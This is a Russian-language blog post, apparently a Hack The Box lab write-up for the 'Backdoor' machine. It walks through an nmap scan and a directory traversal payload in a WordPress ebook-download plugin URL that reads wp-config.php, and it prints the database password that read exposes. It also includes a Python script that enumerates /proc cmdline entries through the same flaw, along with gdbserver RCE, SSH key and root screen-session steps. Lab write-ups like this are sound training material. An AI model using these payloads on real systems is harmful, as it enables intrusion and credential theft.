<!DOCTYPE html><html lang="ru" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HTB Machine Backdoor" /><meta property="og:locale" content="ru" /><meta name="description" content="Hackthebox Backdoor Writeup Box Info" /><meta property="og:description" content="Hackthebox Backdoor Writeup Box Info" /><link rel="canonical" href="https://weirdvoodoo-418.github.io/posts/HTB-Machine-Backdoor/" /><meta property="og:url" content="https://weirdvoodoo-418.github.io/posts/HTB-Machine-Backdoor/" /><meta property="og:site_name" content="WierdVoodoo blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-03-26T00:00:00+03:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HTB Machine Backdoor" /><meta name="twitter:site" content="@404" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-03-26T00:00:00+03:00","datePublished":"2022-03-26T00:00:00+03:00","description":"Hackthebox Backdoor Writeup Box Info","headline":"HTB Machine Backdoor","mainEntityOfPage":{"@type":"WebPage","@id":"https://weirdvoodoo-418.github.io/posts/HTB-Machine-Backdoor/"},"url":"https://weirdvoodoo-418.github.io/posts/HTB-Machine-Backdoor/"}</script><title>HTB Machine Backdoor | WierdVoodoo blog</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="WierdVoodoo blog"><meta name="application-name" content="WierdVoodoo blog"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="https://i.imgur.com/3ktvagN.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">WierdVoodoo blog</a></div><div class="site-subtitle font-italic">Мини блог @WierdVoodoo</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/WeirdVoodoo-418" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/404" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['WeirdVoodoo7','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>HTB Machine Backdoor</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>HTB Machine Backdoor</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1648242000" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Mar 26, 2022 </em> </span><div class="d-flex justify-content-between"> <span> By <em> <a href="https://twitter.com/404">Voodoo</a> </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="425 words"> <em>2 min</em> read</span></div></div></div><div class="post-content"><h1 id="hackthebox-backdoor-writeup">Hackthebox Backdoor Writeup</h1><h2 id="box-info"><span class="mr-2">Box Info</span><a href="#box-info" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p><img data-src="https://i.imgur.com/SgAhOB9.png" alt="Machine Info" data-proofer-ignore></p><h2 id="enumeration"><span class="mr-2">Enumeration</span><a href="#enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><h3 id="nmap-scan"><span class="mr-2">Nmap scan</span><a href="#nmap-scan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap <span class="nt">-Pn</span> <span class="nt">-p-</span> <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">--min-rate</span><span class="o">=</span>256 <span class="nt">--min-parallelism</span><span class="o">=</span>512 <span class="nt">-v</span> <span class="nt">-oN</span> nmap-full.txt 10.10.11.125 
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre>55s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65532 closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span>
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 <span class="o">(</span>RSA<span class="o">)</span>
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp   open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Backdoor &amp;#8211<span class="p">;</span> Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><h3 id="port-80---web"><span class="mr-2">port 80 - web</span><a href="#port-80---web" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p><img data-src="https://i.imgur.com/48XVsUk.png" alt="Site view" data-proofer-ignore></p><p>При переходе на сайт выскакивает ошибка <code class="language-plaintext highlighter-rouge">Unknown host: backdoor.htb</code>, добавим сайт в <code class="language-plaintext highlighter-rouge">/etc/hosts</code> хосты</p><h4 id="analyze-wordpress"><span class="mr-2">analyze wordpress</span><a href="#analyze-wordpress" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Запустим wpscan нашли <code class="language-plaintext highlighter-rouge">http://backdoor.htb/readme.html</code></p><p>заглянем в обычные папки <code class="language-plaintext highlighter-rouge">http://backdoor.htb/wp-content/themes</code> пустая страница, доступ есть но не отображается <code class="language-plaintext highlighter-rouge">http://backdoor.htb/wp-content/plugins</code> видим плагин <code class="language-plaintext highlighter-rouge">http://backdoor.htb/wp-content/uploads</code> есть доступ но файлов там нет</p><p>в plugins нашли <code class="language-plaintext highlighter-rouge">ebook-download/</code> версии <code class="language-plaintext highlighter-rouge">1.1</code> на нее есть cve Directory Traversal <code class="language-plaintext highlighter-rouge">https://www.exploit-db.com/exploits/39575</code></p><h2 id="getting-shell"><span class="mr-2">Getting Shell</span><a href="#getting-shell" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><h3 id="directory-traversal"><span class="mr-2">Directory Traversal</span><a href="#directory-traversal" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Exploit <code class="language-plaintext highlighter-rouge">backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php</code></p><p>Узнаем креды для подключения</p><div class="language-php highlighter-rouge"><div class="code-header"> <span data-label-text="PHP"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre><span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_NAME'</span><span class="p">,</span> <span class="s1">'wordpress'</span> <span class="p">);</span>

<span class="cd">/** MySQL database username */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_USER'</span><span class="p">,</span> <span class="s1">'wordpressuser'</span> <span class="p">);</span>

<span class="cd">/** MySQL database password */</span>
<span class="nb">define</span><span class="p">(</span> <span class="s1">'DB_PASSWORD'</span><span class="p">,</span> <span class="s1">'MQYBJSaD#DxG6qbm'</span> <span class="p">);</span>
</pre></table></code></div></div><p>Подключаемся к машине</p><p>из <code class="language-plaintext highlighter-rouge">/etc/passwd</code> узнаем имя пользователя <code class="language-plaintext highlighter-rouge">user</code></p><p>Информации больше нет, куда стучаться тоже непонятно. Остается неизвестный порт 1337, значит какой то процесс запущен на машине Из узявимостей есть только Directory Traversal, можно почитать системные файлы из <code class="language-plaintext highlighter-rouge">/proc</code> и поискать процесс с командой выполнения</p><p>в скрипте проблема, что он пишет в файл бинарно, лень разбираться как чинить, поэтому сделал через костыль <code class="language-plaintext highlighter-rouge">strings output.txt &gt; output_good.txt</code></p><p>#todo закинуть в fli блок код</p><div class="language-python highlighter-rouge"><div class="code-header"> <span data-label-text="Python"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="n">url</span> <span class="o">=</span> <span class="s">"http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../"</span>


<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"output1.txt"</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
	<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3000</span><span class="p">):</span>
		<span class="n">resp</span> <span class="o">=</span> <span class="n">req</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="sa">f</span><span class="s">"proc/</span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s">/cmdline"</span><span class="p">)</span>
		
		<span class="n">text</span> <span class="o">=</span> <span class="n">resp</span><span class="p">.</span><span class="n">text</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"&lt;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
		<span class="n">text</span> <span class="o">=</span> <span class="n">text</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"cmdline/"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"cmdline/"</span><span class="p">))</span> <span class="o">&gt;</span> <span class="mi">1</span> <span class="k">else</span> <span class="s">""</span>
		
		<span class="k">if</span><span class="p">(</span><span class="n">text</span> <span class="o">!=</span> <span class="s">""</span><span class="p">):</span>
			<span class="n">result</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"FIND pid </span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s"> command: </span><span class="si">{</span><span class="n">text</span><span class="si">}</span><span class="s">"</span>
		
		<span class="k">else</span><span class="p">:</span>
			<span class="n">result</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"pid </span><span class="si">{</span><span class="n">i</span><span class="si">}</span><span class="s"> none"</span>

		<span class="k">print</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
		<span class="nb">file</span><span class="p">.</span><span class="n">writelines</span><span class="p">(</span><span class="sa">f</span><span class="s">"</span><span class="si">{</span><span class="n">result</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span><span class="si">}</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</pre></table></code></div></div><p>потом в Sublime при помощи простого регулярного выражения меняем <code class="language-plaintext highlighter-rouge">pid \d{1,5} none\n</code> на пустоту и имеем <img data-src="https://i.imgur.com/S1g4y9T.png" alt="Screen 1" data-proofer-ignore></p><h3 id="getting-shell-1"><span class="mr-2">Getting shell</span><a href="#getting-shell-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Видим сервис gdbserver</p><p>Находим на него RCE <code class="language-plaintext highlighter-rouge">https://www.exploit-db.com/exploits/50539</code></p><p><img data-src="https://i.imgur.com/ZsjrB4p.png" alt="Screen 2" data-proofer-ignore></p><p><img data-src="https://i.imgur.com/ktTVEGK.png" alt="Screen 3" data-proofer-ignore></p><p>добавил себя в SSH</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>ssh-keygen <span class="nt">-t</span> rsa
<span class="nb">cat</span> .ssh/id_rsa.pub

<span class="c"># скачал себе id_rsa и авторизировался по нему</span>
<span class="nb">chmod </span>700 id_rsa
ssh <span class="nt">-i</span> id_rsa user@backdoor.htb
</pre></table></code></div></div><h3 id="getting-root"><span class="mr-2">Getting ROOT</span><a href="#getting-root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Запускаем linpeas</p><p>Помимо всего прочего видим сессию рута <img data-src="https://i.imgur.com/eUDrJcH.png" alt="Screen 4" data-proofer-ignore></p><p>смотрим сессии screen <code class="language-plaintext highlighter-rouge">screen -ls</code></p><p>подключаемся к сессии рута <code class="language-plaintext highlighter-rouge">screen -X root/root</code></p><p>Мы рут :)</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>writeup</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HTB+Machine+Backdoor+-+WierdVoodoo+blog&url=https%3A%2F%2Fweirdvoodoo-418.github.io%2Fposts%2FHTB-Machine-Backdoor%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HTB+Machine+Backdoor+-+WierdVoodoo+blog&u=https%3A%2F%2Fweirdvoodoo-418.github.io%2Fposts%2FHTB-Machine-Backdoor%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fweirdvoodoo-418.github.io%2Fposts%2FHTB-Machine-Backdoor%2F&text=HTB+Machine+Backdoor+-+WierdVoodoo+blog" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/HTB-Machine-Blue/"><div class="card-body"> <em class="small" data-ts="1649970000" data-df="ll" > Apr 15, 2022 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB Machine Blue</h3><div class="text-muted small"><p> Hackthebox Blue Writeup This is the writeup for the machine Blue from Hack the box Box Info Enumeration Nmap scan 1 nmap -sV -sC -v -oN nmap.txt 10.129.155.247 1 2 3 4 5 6 7 8 9 10 11 12 13 1...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"><div class="btn btn-outline-primary disabled" prompt="Older"><p>-</p></div><a href="/posts/HTB-Machine-Blue/" class="btn btn-outline-primary" prompt="Newer"><p>HTB Machine Blue</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/404">Voodoo</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/writeup/">writeup</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/ru.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
